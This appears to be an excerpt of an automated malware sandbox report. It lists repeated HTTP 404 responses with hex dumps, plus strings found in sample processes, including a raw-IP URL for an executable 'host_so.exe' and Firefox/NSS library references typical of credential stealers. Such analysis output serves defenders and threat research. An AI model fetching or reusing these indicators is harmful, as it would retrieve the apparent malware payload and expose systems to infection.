                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^|
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDm*w_c*^nUSssD
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:27:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                    Source: 5876.exe, 00000007.00000003.2014729641.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.54/
                    Source: 5876.exe, 00000007.00000003.2014765574.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2014729641.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.54/N
                    Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1788178535.000000000085D000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2014765574.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1760169194.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1746306050.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1760479416.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1788207349.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2058603010.000000000085C000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1772605179.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2087586724.0000000000863000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152636525.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2014729641.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.54/file/host_so.exe
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
